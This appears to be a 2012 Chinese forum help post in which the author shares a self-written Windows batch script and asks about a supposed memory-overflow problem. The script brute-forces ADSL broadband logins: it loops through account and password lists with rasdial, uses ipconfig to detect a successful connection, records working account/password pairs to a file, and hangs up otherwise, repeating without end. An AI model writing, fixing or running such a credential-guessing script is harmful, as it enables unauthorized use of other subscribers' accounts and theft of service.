标题: [问题求助] SOS 应该算是批处理内存益出问题吧 这个是自己原创的 在线求解 [打印本页] 作者: pqf518888 时间: 2012-3-5 21:41 标题: SOS 应该算是批处理内存益出问题吧 这个是自己原创的 在线求解
:xunhuan
@echo off
for /f "delims=" %%b in (adsl1.txt) do (echo %%b>adsl.txt
for /f "delims=" %%c in (mima.txt) do (
for /f "delims=" %%e in (adsl.txt) do (
rasdial 宽带连接 %%e %%c
echo 当前测试的账号%%e密码%%c>mima1.txt
ipconfig>ping.txt
for /r %%a in (ping.txt) do findstr "宽带连接" "%%a" &&echo 账号%%e密码%%c>>new.txt||rasphone -h 宽带连接
)
)
)
)
goto :xunhuan